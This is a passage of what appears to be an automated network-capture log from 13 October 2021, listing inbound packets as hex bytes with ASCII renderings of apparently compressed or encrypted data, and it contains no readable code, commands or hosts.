cd 0b 01 c7 67 ed 45 d3 41 55 b9 ee e4 0e 3f b9 5a 57 3d 66 f4 2e 74 54 7f 6c 63 12 7d 08 a6 80 4b 02 d8 88 53 07 7a 87 0c 59 58 4f f3 b0 7f
                                                          Data Ascii: j5=k/%(}9-@PJw)E}DmtEn;?Z$d7oKl1G$Z&9/NjV8>1CHp<~ND""Vf~\{/O{)diw(Xx<FU`')zRst]gEAU?ZW=f.tTlc}KSzYXO
                                                          2021-10-13 15:10:52 UTC188INData Raw: fb 43 52 c0 2f de 1e 9f 1c 32 a6 73 9c cb 66 f4 df 1d 33 cd 06 59 86 e5 08 b4 2f 4e f1 46 c4 a7 d5 d7 e8 6f 5a 86 49 92 6c 5a 5a c9 df 96 bc 48 43 9c 2e 09 66 4e 6f 6a 37 e3 cb 84 a0 00 4b b4 1a 1e ed 47 af 9d aa 3f f2 4f 7f 08 cb ec 09 c8 95 a9 77 e4 bb b1 76 83 db cb bd 84 22 43 d0 c6 ef 95 63 f8 71 49 65 0f c8 4c 1f c3 ae ae fd bf 4c cf 6e e7 f6 55 2e 02 ed 56 c4 ad d1 3c 77 78 85 e2 36 fe b9 5f fd 49 96 ab 8b 75 36 d4 fd 8f 78 8d 5a 50 a6 aa ea 68 e9 e5 c9 e4 50 6b de c9 72 5f 99 a4 90 4e 83 e0 42 b2 29 7c 80 d3 8f a5 33 8c 16 0f 1c b1 60 48 bc b7 6f 54 33 8b 21 23 9d 9e 69 b1 4b 12 49 e5 f0 f7 6f c1 af 03 67 ec d7 17 30 ba 92 37 4d 02 79 c6 13 12 81 df cd 68 c5 34 6d b7 05 e8 6d 21 2c 2b e9 50 b7 9a 54 5c 59 06 6c 27 af 9c 2a 4a 03 26 d1 a4 a8 e5 20
                                                          Data Ascii: CR/2sf3Y/NFoZIlZZHC.fNoj7KG?Owv"CcqIeLLnU.V<wx6_Iu6xZPhPkr_NB)|3`HoT3!#iKIog07Myh4mm!,+PT\Yl'*J&
                                                          2021-10-13 15:10:52 UTC189INData Raw: 04 4a 0c e2 92 ba ac 3d 90 e4 24 1f ee 95 6a 26 ef 56 1c 02 1c 2a a6 6b 4f 19 70 55 1b 8f 39 ca 66 e2 79 0e 0e db db 8f ad 0a d4 64 d4 df b7 9e 97 9b f9 d0 38 43 04 e5 75 a0 88 2d f5 8e f5 63 7a 20 97 05 70 60 52 a9 0c 00 17 cc 98 20 62 cb a0 db 14 09 4d 0f 5f 7c 2f a6 14 f7 24 0c 66 5c 3b 26 ea 33 24 4e e1 9c 40 26 47 13 0d 46 46 10 e9 2c 9b cd 71 04 37 7b de 57 9c f3 82 97 53 82 15 a2 eb a9 5d 1e 75 ef e6 7a 17 ee fc eb 21 6d 8a 6e 53 ab 4a 1a ae 1f 91 74 53 67 37 0e a6 40 3f 78 25 db 02 10 e3 28 08 36 ca 54 f2 73 87 e6 fc 6b 76 87 6b 71 b2 a6 c5 be 03 4e a9 81 c5 2f f5 25 1b d6 37 5b 47 a0 b9 91 f0 8a 00 fd 9c 3c 93 cc 26 28 58 b4 bc 41 1d e1 23 06 51 7e 2f d6 79 ec 5b f5 10 03 ad 34 9f b5 ab ee 51 be 29 7d 66 ef de 32 b5 00 78 8c d4 06 e4 8a 8a 50 a1
                                                          Data Ascii: J=$j&V*kOpU9fyd8Cu-cz p`R bM_|/$f\;&3$N@&GFF,q7{WS]uz!mnSJtSg7@?x%(6TskvkqN/%7[G<&(XA#Q~/y[4Q)}f2xP
                                                          2021-10-13 15:10:52 UTC191INData Raw: d9 6c 64 0a 68 37 97 73 8d 18 c8 3c e9 b9 62 52 1f 6c 47 6e 3f a7 38 79 e1 c3 30 54 92 68 35 a2 c2 9c 87 82 4a 37 3a 26 fe 76 da 7d 50 f0 4d f6 06 d9 18 45 d0 57 74 81 97 1e 0d df 48 17 67 49 f1 3c 30 3d 2f 38 52 ec 7a c1 0e c9 28 2a 67 a2 53 aa 90 6c 0d 33 f3 25 5e 33 2f e0 99 61 b5 cc 6f d1 43 23 62 28 f1 b9 1c 9b 57 9f 9b 58 41 44 74 7b ae 82 14 2e b9 34 24 55 06 8d bb 62 c6 5a b3 b7 51 bd 52 39 b8 04 9d 96 de 7e d6 44 6f 4d e5 78 0c 76 ab d7 4d bf ce 70 84 08 5e e5 28 73 48 70 d3 5e 27 9d a8 0d 44 6a 55 7b 65 84 7b ea e4 c5 ec bb 51 21 58 cb c8 76 94 8f 0b 7a e4 36 70 4e 83 17 a5 4d 79 02 7d 29 18 b8 05 0c 38 e4 a8 2f 71 de a8 e1 65 51 82 1e 25 05 c2 9b 97 bf 1c fd 68 52 78 ea fc 78 c4 b1 27 f5 32 52 fa 38 44 00 48 33 33 71 9c 49 9e 9e c1 44 b9 18 ac
                                                          Data Ascii: ldh7s<bRlGn?8y0Th5J7:&v}PMEWtHgI<0=/8Rz(*gSl3%^3/aoC#b(WXADt{.4$UbZQR9~DoMxvMp^(sHp^'DjU{e{Q!Xvz6pNMy})8/qeQ%hRxx'2R8DH33qID
                                                          2021-10-13 15:10:52 UTC192INData Raw: 3b 78 d1 54 18 e8 0b d3 20 52 10 3d 4e 0a 80 0b e3 2f 5c eb 2b 90 74 aa a2 0b 48 9d 30 05 4c f3 70 a2 96 68 b3 ac c3 88 11 19 5c 21 4f 11 1e bd 42 bd 0c b9 bb ac b8 79 6b 60 f2 55 00 1d db 23 37 06 e4 6f 3f 8c 2b 6d 6d 6b 1a 1f 6f ca a8 e0 72 0b bc 7c 8a fd 92 0f a0 24 cd f2 d2 ed 65 d6 fd 10 b3 93 1c cf 94 bd a3 51 61 d4 d8 15 39 57 90 17 42 40 93 95 61 58 d7 cc 76 60 48 90 7f 26 1a 22 ef 2e 76 77 45 74 45 22 39 97 a4 41 97 15 d2 d3 25 7b 12 4b 6d d0 cb f8 85 86 05 db 31 5b da 9f 95 18 c9 16 3e 16 d3 88 39 8f 00 5b 6b e7 39 da 2b 53 a0 4e 30 fd 3c c9 11 fb 49 8e 43 ed 90 16 7e 50 f6 0a 7d 10 9b fe e9 5a 4d c2 44 d0 89 49 c2 0c ac 04 da 84 b5 2b a9 75 2e 57 ae 7f a4 f7 af 47 cd 66 67 43 be b1 5f 3a 2f 39 2a 7d 94 9c 83 db 6b 44 c9 99 18 92 dd 1b 67 60 ca
                                                          Data Ascii: ;xT R=N/\+tH0Lph\!OByk`U#7o?+mmkor|$eQa9WB@aXv`H&".vwEtE"9A%{Km1[>9[k9+SN0<IC~P}ZMDI+u.WGfgC_:/9*}kDg`
                                                          2021-10-13 15:10:52 UTC193INData Raw: 89 0f 6a 42 73 3f 34 3c 79 56 59 fd 2c 24 a2 52 0a ca 62 2c ec 65 c2 12 9e ea 0d 57 bc b0 2c 69 dc 93 f3 d4 1f 67 1f b7 56 cc b6 67 9b 2c 0e 46 12 ab b1 08 26 f8 31 44 fb 38 a4 46 29 34 6e a2 42 1b 77 33 9d 32 30 7d 17 e4 55 a4 9d 9e 96 1c ef 8c f5 97 4d 51 39 a0 17 d3 13 1b bc ef 80 af 69 95 cf e3 01 87 1a 45 90 3a 00 58 30 2f e1 0f cc 3b c8 0e e0 db 4d 13 55 50 73 b2 5b 03 c2 f7 ac fd 6b 1f 0d be 70 db 45 9c 2a 46 c2 3b 8c d1 6b 3b 2a 56 f0 5b a1 66 ad b7 d0 bf 54 33 df 78 0f c6 bc 06 7c 70 9f 3f 68 b7 fe 56 95 b8 08 90 fd 90 e1 8c 7e fe 45 2c 69 23 c5 0b 3f 78 ae 82 f0 ca 41 4e 6c 9b f8 28 0a ec cf 2a ca 29 c4 ad 7e 52 85 53 3f 61 b0 5b f9 e6 89 eb 8f 73 32 5a e2 ce 7c 95 5e 21 b3 ec eb 62 ed 82 de b6 54 67 da 54 6d 0c 9d 00 90 3d a0 bf 43 4c 2a ae ad
                                                          Data Ascii: jBs?4<yVY,$Rb,eW,igVg,F&1D8F)4nBw320}UMQ9iE:X0/;MUPs[kpE*F;k;*V[fT3x|p?hV~E,i#?xANl(*)~RS?a[s2Z|^!bTgTm=CL*
                                                          2021-10-13 15:10:52 UTC194INData Raw: a5 cf 2a 72 7a 4f fd 01 00 f2 ea cb 80 1d 5e fc cc 80 22 e9 64 86 44 24 5f b6 b9 9e e5 ba 1b cf 5a 34 3c 84 e0 10 77 d7 7e f2 72 25 7e 88 a7 de 61 0f db 03 52 7e 5f a5 0d c9 59 4d f9 b1 7c 84 35 a0 69 d7 ce 38 81 e3 41 85 3e 46 b4 a4 b8 cd 77 90 bb bf 56 c7 d8 5a d5 d2 42 cd 16 a7 16 f7 65 d5 29 5d 15 11 d2 8b ba 3e f8 41 b0 3d 0d f3 cf 0d f7 e7 b2 ca 32 0d 0b ec 74 a4 63 90 cb 70 f5 14 68 cc 32 0f bf 8d dc 9b 96 66 5f d9 94 6f a1 9c a0 85 0f 49 a2 27 ea 3b 3c 5d c6 01 28 20 24 87 c9 7a 1f 6d 2c ca 93 b2 c7 92 ea 2a be ca 65 23 69 f4 c4 a1 cf 03 67 36 36 df d7 a9 67 b1 68 bb 99 15 ab e9 ca 62 e7 34 44 75 1d eb 59 06 34 50 3c f6 c0 5b 33 dd 96 ac 31 38 e4 17 83 3e 4f a9 1c ab fa 3a de 67 51 4d 49 27 05 24 1b c4 d3 30 7a 2a 95 8f 0a 9c 64 5e 45 d4 ef 7a 15
                                                          Data Ascii: *rzO^"dD$_Z4<w~r%~aR~_YM|5i8A>FwVZBe)]>A=2tcph2f_oI';<]( $zm,*e#ig66ghb4DuY4P<[318>O:gQMI'$0z*d^Ez
                                                          2021-10-13 15:10:52 UTC195INData Raw: 94 2f 69 35 03 b3 01 17 a3 28 2e 03 a6 d3 07 ae c2 89 71 cd e3 c7 1b 8a 11 f0 7f 52 e9 72 ca 88 86 e9 29 21 65 fa 1b 7c 66 98 8d c8 b7 d7 0e 7c 3d fe 24 bd f3 ab 4c a3 71 36 fa fd eb 00 49 a4 b7 21 f1 4d ce 21 52 10 de 1b 50 83 40 ad 48 cf a6 ad 94 3e e0 3a f0 ec dc 03 df bf b0 da 41 49 c7 32 6b c8 ab 45 dc e5 56 54 0a 75 01 37 02 ba 77 67 48 7a 02 67 98 df 81 54 d3 1c 1b 99 1d f8 0b 6e 20 f3 59 38 93 91 74 b9 25 32 ad ae 11 ee 91 df 09 4a be 93 59 4a f5 48 9d 93 d7 2b 7e 48 1c 0c a5 56 fc 7b 5e f2 af 3a 5f 58 b5 fe 35 6c cd a0 3a 7f 22 e4 19 3d bd 1d 7e 78 51 48 e6 01 28 ee 0a 9e 62 09 54 2c 56 3a c1 55 cb 56 48 a0 6f cd 34 aa 9a 40 7d dd 06 00 79 cb 41 ed 93 74 d3 97 c3 5c 7b 55 1f 47 3b a3 2f a8 1b d0 6d 55 f7 84 ce 47 5f ec a3 77 56 7b af 85 06 4d 85
                                                          Data Ascii: /i5(.qRr)!e|f|=$Lq6I!M!RP@H>:AI2kEVTu7wgHzgTn Y8t%2JYJH+~HV{^:_X5l:"=~xQH(bT,V:UVHo4@}yAt\{UG;/mUG_wV{M
                                                          2021-10-13 15:10:52 UTC196INData Raw: 97 0c 3a 4a 71 2a 24 c7 9c e4 a3 6b 66 9a b9 5b dd dd 64 33 40 8f ee 50 59 d6 09 3f 03 1f 6a 11 5d f7 0b ec 74 54 b9 45 cb a4 cd 7e 73 1e 67 fc 05 54 f0 8c e2 81 19 0a fd 8e ab 23 c9 31 84 00 0e 5e 96 ec 9f a3 6f 1a ed 0f 36 74 40 e1 16 22 d5 1c 38 73 2f 2b 89 c3 2b 60 03 8e 01 34 88 5e a9 58 c8 15 a0 b2 90 2a c1 42 72 19 db 83 7e e7 16 0a b2 4b 2e f1 27 ec a2 35 c7 bb 0c 01 a8 9c 0e d5 66 15 bc 50 f0 16 42 32 a4 61 09 15 8e b6 8c e5 76 ae b8 c2 2b 79 ae 86 a1 f6 f3 e4 cb 50 a0 0a fa 22 a6 07 3a ca 62 a3 15 0e 67 33 1f e9 8f 9e 32 97 5c 08 d8 d0 c7 a0 a0 f7 87 49 3d a0 1b bd 3a 74 2e c4 1b 7f 22 46 f5 cb 64 48 6c 48 bb 91 aa 90 90 8c 5a bc d2 32 22 2a b4 b4 89 cf 4c 08 69 51 18 be c4 02 de 12 6d 99 4d f3 b1 8b 6b e3 6b 1c fb 5a e2 5d 71 6c 6e 78 15 c4 22
                                                          Data Ascii: :Jq*$kf[d3@PY?j]tTE~sgT#1^o6t@"8s/++`4^X*Br~K.'5fPB2av+yP":bg32\I=:t."FdHlHZ2"*LiQmMkkZ]qlnx"
                                                          2021-10-13 15:10:52 UTC198INData Raw: 08 83 e3 bb a2 13 0f ae 1d 0c 6a f5 4e ff 5b c5 a9 24 26 5e f0 fe 0b e5 c7 55 50 59 b4 6b d7 11 77 c6 0d 03 5d 43 92 40 9a d9 40 0d 50 4b b8 29 38 95 2d 00 56 c3 b2 37 fe a6 a4 5d cd f1 e7 11 9c 15 92 50 45 f0 33 be ae 96 f2 37 28 61 f4 22 7a 6d 93 ed ba d8 ff 08 6b 36 f9 1f b5 f2 a1 6d a9 67 33 cb be cb 3c 48 b2 b1 0c af 29 e3 6c 4b 3e e1 1d 7e d2 14 9f 2f eb b6 84 a0 20 e0 6a ad 88 d2 66 ca b4 a1 e9 30 12 a0 3a 6c cf b0 4b c1 df 5e 49 47 4d 0c 3c 31 c1 04 46 5e 67 04 01 c4 b6 b0 5e d6 1d 4e 86 12 f9 54 28 66 d5 53 08 da 98 65 fe 48 47 8c ae 23 ef a8 d0 0f 18 f8 f6 4b 4a d0 42 8c d2 b1 59 50 48 65 29 a1 4e d6 6b 7d f6 95 2d 4f 0b c7 db 28 6a ff a6 39 75 26 e4 34 2f ea 78 38 5f 72 70 97 42 72 b2 6e b6 41 5d 70 01 31 67 ee 03 ab 0b 03 90 4a 87 14 93 e0 62
                                                          Data Ascii: jN[$&^UPYkw]C@@PK)8-V7]PE37(a"zmk6mg3<H)lK>~/ jf0:lK^IGM<1F^g^NT(fSeHG#KJBYPHe)Nk}-O(j9u&4/x8_rpBrnA]p1gJb
                                                          2021-10-13 15:10:52 UTC199INData Raw: 90 f6 16 2a 98 51 18 e7 e2 4d 8c 24 1a 63 28 8e ec 58 bb bf c9 e7 89 f3 c5 81 c7 09 7a 12 de fa a4 8f ca 61 b8 f7 0e b4 c7 a4 2d 55 5a 4d 49 2e f8 c8 fb 80 0e 01 8b d0 77 ed 89 48 33 39 bb df 50 7b e7 7d 26 36 69 4c 31 3c cd 0b 95 65 65 b9 54 fa d0 f1 4b 05 1b 47 9d 12 54 89 9a d3 81 39 3b 89 98 87 53 ef 64 d7 2b 38 35 b6 cd cb 9c 4a 7f aa 29 53 48 4a a2 18 19 a1 1b 03 07 18 07 f9 c2 7e 26 0f b7 64 01 b5 3f bc 68 c8 1a 86 95 aa 1d f4 50 05 38 ce bc 6d ee 16 34 9a 4b 27 c0 3e cb c7 77 f6 de 3b 08 e1 b6 2e b4 51 2a dd 78 d2 55 70 08 d0 5c 2d 70 e9 b4 9d ce 60 bb cd c3 3c 68 9f bb b4 83 fe c6 be 40 93 0a da 15 d6 17 19 b8 62 f5 54 18 41 5f 11 dc ee a8 0c f8 71 1d b9 e7 f5 a0 ab c1 ea 6a 25 c2 36 8f 59 48 3a ab 16 44 47 47 d6 a2 68 71 2e 4d 9f f4 cf 8f e4 9e
                                                          Data Ascii: *QM$c(Xza-UZMI.wH39P{}&6iL1<eeTKGT9;Sd+85J)SHJ~&d?hP8m4K'>w;.Q*xUp\-p`<h@bTA_qj%6YH:DGGhq.M
                                                          2021-10-13 15:10:52 UTC200INData Raw: fe ae 27 86 0a 28 f6 4e 6c 4b 8b 99 c4 69 a3 a9 3d 36 85 15 58 64 f5 39 f9 a2 ee ed c8 13 32 10 85 c9 1d fb 5e 41 d4 e3 88 0e ed e4 b9 a2 33 0f ae 0a 27 69 f8 6a 90 59 c7 a9 24 24 2a fc d4 17 f2 c9 5d 0a 48 ae 6b dd 02 50 c0 07 01 5d 43 92 40 9a c4 4e 0d 51 22 90 27 54 be 05 18 7e c7 c6 02 dd ab ae 50 ca f8 cd 7e ad 24 d4 2b 72 e7 20 a5 a5 ac e8 22 4d 47 fc 1b 50 67 95 82 9d de fc 1f 19 00 f3 1f a8 f8 a2 0e 82 71 37 bc 94 cc 2b 0e 9e ae 20 a7 24 e8 0b 13 15 ff 3c 7c f4 10 ec 2d b8 f6 88 81 3c e0 67 a5 ec e3 09 ef b0 a6 d3 44 4f 94 0b 70 c2 b7 4d af cf 43 43 45 52 0d 1d 50 fc 16 41 4f 6d 19 3a cd df 86 5f d7 0b 2d b1 03 e9 7c 3d 54 c6 65 19 a8 96 6e ed 17 76 90 bc 1e e6 b7 d0 19 2a f8 e1 64 4b db 26 ae c5 91 7b 47 44 13 3b b0 5f d9 6c 61 f5 af 24 5a 39 c1
                                                          Data Ascii: '(NlKi=6Xd92^A3'ijY$$*]HkP]C@NQ"'T~P~$+r "MGPgq7+ $<|-<gDOpMCCERPAOm:_-|=Tenv*dK&{GD;_la$Z9
                                                          2021-10-13 15:10:52 UTC201INData Raw: 3f cb a0 ec f7 69 58 62 59 a9 ae f0 f6 e7 cd 53 3f d3 72 5c 88 5f 14 19 05 56 95 52 5e d4 82 5c 36 4f e9 65 05 1a 38 20 dd e2 dc 0a 32 a6 44 12 c7 f4 5e 86 48 4c 71 21 8f d6 49 ac ae ce 8b bf d4 c4 84 a9 2c 43 6b ed f2 a4 98 c2 02 88 e8 67 86 d3 f4 18 57 2e 6a 47 41 d2 f5 ee 95 38 75 bb dc 78 e4 dd 40 02 34 94 f8 31 6f e7 5a 0d 25 7a 4c 28 5d f8 3a 98 47 65 ca 57 f0 ca dd 4f 20 0e 41 99 01 6d f0 ae d3 e7 12 3f 89 a9 ad 57 f8 01 e5 29 5b 39 b6 cd c0 a0 54 7e e5 3c 65 48 67 84 16 1a d5 3d 1f 0a 3c 0a e6 f4 0a 12 03 ba 6c 52 9a 3b ba 5f ad 28 9c 9d a9 08 d5 41 77 0d db a3 39 cc 20 2d 87 4c 3d e7 3f cb c7 16 fc bb 28 32 dc 87 14 85 42 31 dd 7b a6 71 60 10 fb 7e 0f 74 9b b2 95 ba 58 9d cc ee 1e 6c 83 ae 9a f6 f0 df cb 51 9b 0a fd 19 a6 04 09 be 58 bc 61 0d 5c
                                                          Data Ascii: ?iXbYS?r\_VR^\6Oe8 2D^HLq!I,CkgW.jGA8ux@41oZ%zL(]:GeWO Am?W)[9T~<eHg=<lR;_(Aw9 -L=?(2B1{q`~tXlQXa\
                                                          2021-10-13 15:10:52 UTC203INData Raw: 14 d4 03 8f d1 1a 41 be ce 68 68 f6 43 04 df d7 90 01 de 91 3d be 34 53 f7 88 f7 83 aa 14 b1 30 13 2b 90 99 6a 51 ce c2 12 86 a9 24 f6 1b 27 99 46 0a 0a 9e 98 b1 46 a1 c7 0a 1f f0 3d 53 21 c8 3d 9c 94 fd 84 e0 1a 32 11 8c bf 1d f0 37 47 fc 93 8e 1b 8c f4 b7 cd 3a 2f a2 36 08 69 e9 64 ff 51 a0 fa 2c 20 41 ca d9 21 fe cf 55 54 68 af 76 d6 63 75 db 0e 13 30 55 99 40 80 ec 4c 0c 45 3f 97 2f 3a f0 07 0a 46 f9 f6 02 ec a1 b2 5d d3 e2 c3 11 96 70 e1 76 43 d6 07 af b2 a6 f4 2c 3d 74 f0 00 7b 09 91 88 8d e8 c1 0c 78 27 ff 1f 98 f8 bc 43 b4 6a 26 bf 94 cd 22 20 84 ba 32 b4 28 eb 42 41 26 e3 27 78 db 14 b1 0b e1 ac a8 81 3c e8 60 ac 89 d3 23 d5 b4 b6 c3 06 12 a8 11 02 ee b7 5c c6 f8 5f 4e 24 71 1c 2b 58 e6 10 51 54 72 00 35 d8 b6 a0 5e dc 78 1c a5 1d 8c 5f 39 54 f8
                                                          Data Ascii: AhhC=4S0+jQ$'FF=S!=27G:/6idQ, A!UThvcu0U@LE?/:F]pvC,=t{x'Cj&" 2(BA&'x<`#\_N$q+XQTr5^x_9T
                                                          2021-10-13 15:10:52 UTC204INData Raw: 56 33 e3 6f 30 03 d0 e1 0f 00 be f1 1f 7c 26 2a 13 06 75 54 9f 73 04 71 0a 05 2f 5a 5a 8a e3 40 f2 80 a6 36 57 50 46 61 2a 36 a5 8e f7 f2 66 08 50 52 bb b7 f0 ef ac e7 3e 16 bd 62 56 98 65 2f 3a 26 4b 90 46 73 d4 8a 42 36 6f f8 63 3f 28 30 14 da f9 c1 1b 39 f6 62 18 cb ef 6a 9b 4d 38 67 36 fb cc 62 b6 aa de e7 98 ee c3 ab c6 00 58 0e dc eb c1 ae af 40 a4 eb 06 b2 c7 b2 30 48 43 43 5e 35 f1 ee 82 97 0e 75 96 fa 76 e4 ad 52 13 25 b9 ba 03 79 f0 7f 1c 25 5c 42 28 2d ca 2b 89 67 00 de 42 eb fb ea 44 00 28 56 8f 0f 6c 86 8f c4 81 0d 3b 89 93 ba 4d f9 36 e1 37 34 32 a5 dc ed e5 69 7f de 19 5a 55 65 83 18 16 a7 1a 3b 1a 29 09 ec d5 7e 34 09 97 6e 25 b8 2c ce 6b ba 59 8e 8a da 3f ee 47 05 2c d3 bc 39 c7 29 2f 87 4c 44 f7 39 dc c3 03 f4 eb 3d 38 c2 bd 3b a1 66 31
                                                          Data Ascii: V3o0|&*uTsq/ZZ@6WPFa*6fPR>bVe/:&KFsB6oc?(09bjM8g6bX@0HCC^5uvR%y%\B(-+gBD(Vl;M6742iZUe;)~4n%,kY?G,9)/LD9=8;f1
                                                          2021-10-13 15:10:52 UTC205INData Raw: 84 34 b0 13 86 6f 92 48 33 24 4a 06 12 e2 3e 6c 99 99 d9 36 26 47 4f ca 15 fd 1e 26 5a 35 c2 36 d1 92 3c 5e 47 79 bb e7 c1 02 c2 04 88 90 3b 5c ad d3 73 01 d1 68 0f bc f1 8f 1b c3 9f 3a d0 06 21 d3 92 f4 90 a1 12 8d 2c 08 0a 85 cb 58 46 da d3 32 93 e4 15 e3 17 3a d8 7a 6f 2c 99 93 a5 59 81 d1 0e 23 e0 22 4c 0d df 30 8a e4 ee 88 fb 2b 7b 36 81 a5 09 f8 3b 6a dd a4 87 06 8f e1 b2 ed 24 0f a8 34 19 70 f2 63 e3 3f d3 cc 37 1c 63 c1 ce 08 f3 c8 55 6d 72 81 75 d7 01 55 c5 26 16 38 42 96 40 ac fb 41 1a 35 18 87 33 20 95 0d 41 71 c9 de 0b fa a1 b4 5d cc f8 d9 7e 8b 15 e6 4c 7a e8 3b a3 ac b0 eb 04 38 74 f6 02 74 7d 9f 8e ab d2 f6 11 6b 36 e9 18 b5 f2 a1 53 c6 50 22 b9 94 cc 2b 73 a7 af 28 b4 02 f6 18 7a 3c e3 20 11 e4 14 f8 2d f6 8d ab 81 27 e6 67 b1 ec d0 03 d9
                                                          Data Ascii: 4oH3$J>l6&GO&Z56<^Gy;\sh:!,XF2:zo,Y#"L0+{6;j$4pc?7cUmruU&8B@A53 Aq]~Lz;8tt}k6SP"+s(z< -'g
                                                          2021-10-13 15:10:52 UTC207INData Raw: 74 47 5e 28 36 1a 3f 1f 63 c1 ba 72 ef ca b9 d2 95 fd c6 f2 e9 88 a8 d2 78 13 77 bd 24 f0 e4 73 80 f1 ab c2 0f 0d e5 d8 00 58 31 fc 7e 0d 73 f6 e0 37 05 a2 e9 02 13 2f 2e 0b 1a 5e 5c 89 73 03 78 31 67 0c 7e 4a 87 ca 51 c5 84 a1 26 49 24 12 43 1e 34 89 84 fd c9 60 2b 44 4c ae da e6 fe bd ca 6b 20 b6 73 78 9b 65 33 1e 47 6e 94 49 55 cc 86 55 58 48 8c 42 37 3d 2d 00 c4 f9 d0 10 3f f6 65 04 c0 ef 58 84 0a 01 63 2a 9a ee 69 af aa c2 93 da df da 84 ec 02 4b 06 cb f1 d0 dc ee 76 b9 e4 04 a8 d3 91 31 4e 2e 67 44 37 fd ee ed 9e 06 64 a7 cd 19 d1 b0 4b 23 2f a8 cf 3d 79 ec 7d 79 30 7a 59 1a 0d de 2d 89 7b 74 b9 60 fa d0 fe 4b 01 1f 5d 88 60 67 95 9e e9 c2 0b 2c 8f a9 90 57 8a 2d d4 01 35 3a 83 d6 f6 8b 4e 1a cd 3f 42 63 59 8e 14 16 b9 3b 03 17 1c 11 e0 c9 0a 60 01
                                                          Data Ascii: tG^(6?crxw$sX1~s7/.^\sx1g~JQ&I$C4`+DLk sxe3GnIUUXHB7=-?eXc*iKv1N.gD7dK#/=y}y0zY-{t`K]`g,W-5:N?BcY;`
                                                          2021-10-13 15:10:52 UTC208INData Raw: d8 70 46 7d 81 27 cb e4 32 98 5f 80 97 8f bb 3a 3f 4a 01 7e 7f 1d 59 ff a2 e6 0a 13 dc a2 7e 5c 16 73 0e f5 8f 08 57 6d 5d 98 25 b0 32 b3 7d 94 5b 31 2e 01 35 0a 97 00 7d bb 9e df 2f 31 4c 65 db 09 b4 0c 3a 37 21 bb 65 fb 98 3b 4f 4f 3a c2 dd ca 05 d8 01 92 ca 04 1d 9c cc 79 71 e1 69 1b ce d3 90 1d ce fe 34 db 01 7e d1 8e e9 83 a9 02 92 3c 67 23 93 bf 4e 47 cc c4 22 8a a3 2f e1 2e 3d 85 4d 67 29 80 86 c4 4c a1 dd 21 10 e1 35 4d 01 c3 2d bf 85 e4 84 e3 0d 32 15 97 a5 08 f5 2e 4f ca e3 aa 07 94 80 9c ce 3b 09 b1 16 02 69 e4 0d c3 46 d3 dd 26 2e 04 fd d8 0a f2 c5 5d 41 32 95 7c ca 0a 55 c5 00 1c 3c 44 9e 5b ab ba 69 06 47 26 9f 34 20 95 12 1c 1c e4 db 09 fe b0 b9 34 c4 f3 de 21 ac 1f e6 72 5b d9 2b b3 b2 ac e5 24 21 4d fc 02 7a 7b 8f ed ba c5 f7 19 6d 36 ce
                                                          Data Ascii: pF}'2_:?J~Y~\sWm]%2}[1.5}/1Le:7!e;OO:yqi4~<g#NG"/.=Mg)L!5M-2.O;iF&.]A2|U<D[iG&4 4!r[+$!Mz{m6
                                                          2021-10-13 15:10:52 UTC209INData Raw: 3d 31 6e fc 60 cc f2 23 bd b6 a6 1a 7d 12 3b 3b 22 88 1e ba 28 a7 6d 23 df f8 d3 63 0a e4 ea 0a 7a 08 de b6 32 4c c9 76 4a 1c 2e 3d 53 3b 1e 6c 6e 01 a6 cb 72 ba a5 de a8 d0 92 b4 b9 97 e1 df dc 20 7c 0c d4 70 b1 89 00 eb 92 dd a2 7b 73 11 5d 52 19 45 91 07 44 03 90 86 6f 6a d5 81 76 12 4a 45 79 45 1b 2b 6f 83 78 11 45 67 58 2d 5c fb 84 32 85 61 4f 56 25 51 13 1c 04 57 cb ea 84 95 03 58 32 21 d4 d4 97 9c c9 97 3f 5d c2 81 9c ff 06 4f 07 41 19 f3 39 7b ae ed 35 16 3e 8d 1f 46 4d 5d 42 a0 9e b3 79 48 ea 3b 6c 97 9f 3d e8 2a 45 07 44 fb 9b 8c 03 ca 8c e7 c8 07 72 ec a9 6f 23 65 ad 9f a4 c0 bf 05 cb 8b 75 40 73 e6 df eb 3c a2 ff 53 14 45 8c f6 6b 00 db 39 c4 87 d8 27 67 52 4b 5f 56 3c 83 08 6b d7 fa 29 65 5c be 57 e9 35 00 ab a7 4e a1 8e 2a 61 fa e6 fa 40 01
                                                          Data Ascii: =1n`#};;"(m#cz2LvJ.=S;lnr |p{s]REDojvJEyE+oxEgX-\2aOV%QWX2!?]OA9{5>FM]ByH;l=*EDro#eu@s<SEk9'gRK_V<k)e\W5N*a@
                                                          2021-10-13 15:10:52 UTC210INData Raw: b9 01 d2 b8 41 90 ef 75 bf 49 8f c8 dc f5 4c 88 15 d0 6d c2 60 bd d0 d4 be 6c 7b c3 75 03 ba f9 29 af 8a 38 2b 23 24 66 57 3f 8a 66 93 72 02 7e 52 aa dd d2 2d a2 7a 4a d0 72 8d 24 59 20 a7 24 ec 5f fa 20 8b 0a 37 f1 c1 77 8f d6 bf 6c f8 c5 8e 03 2d b9 06 e9 b2 64 3a 30 2d 67 46 d8 26 8d 1e 0f 9d da 4c 38 6b a7 d3 5f 08 b8 c7 51 31 42 94 6e 4f 88 14 24 2b 96 fd cd 22 74 c3 3a c7 3d 26 08 03 7f 1e 90 67 e1 72 6c f1 1e ee 6c 8f b0 0d 55 f7 00 24 4c ff 70 df 99 31 a2 a4 cb 14 08 12 63 27 52 89 06 a6 54 a7 39 2c bc e8 aa 71 63 ed eb 0a 2a 1b c6 af 2f 43 d5 75 0a 1a 2c 37 46 41 08 ed e2 1d 28 1b 60 d1 ad d0 a4 d2 8f b1 b9 88 e6 d0 ce 32 67 10 50 c9 b2 96 1c ef 88 e1 be 66 7c 8d c5 4a 24 46 8e 0a 4a 04 86 9c e0 f9 d6 9b 76 15 48 48 7d 59 06 3b e8 07 64 95 dc 66
                                                          Data Ascii: AuILm`l{u)8+#$fW?fr~R-zJr$Y $_ 7wl-d:0-gF&L8k_Q1BnO$+"t:=&grllU$Lp1c'RT9,qc*/Cu,7FA(`2gPf|J$FJvHH}Y;df
